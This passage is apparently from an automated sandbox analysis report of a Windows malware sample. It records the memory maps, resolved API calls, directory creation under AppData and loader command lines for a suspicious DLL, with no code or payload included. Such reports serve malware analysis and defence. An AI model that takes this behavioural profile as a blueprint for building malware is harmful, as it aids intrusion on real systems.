| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00337fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x005b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0068ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 99403 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #69: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #69 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe8c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0059ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x0072ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0076ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 99481 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #70: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #70 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe98 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
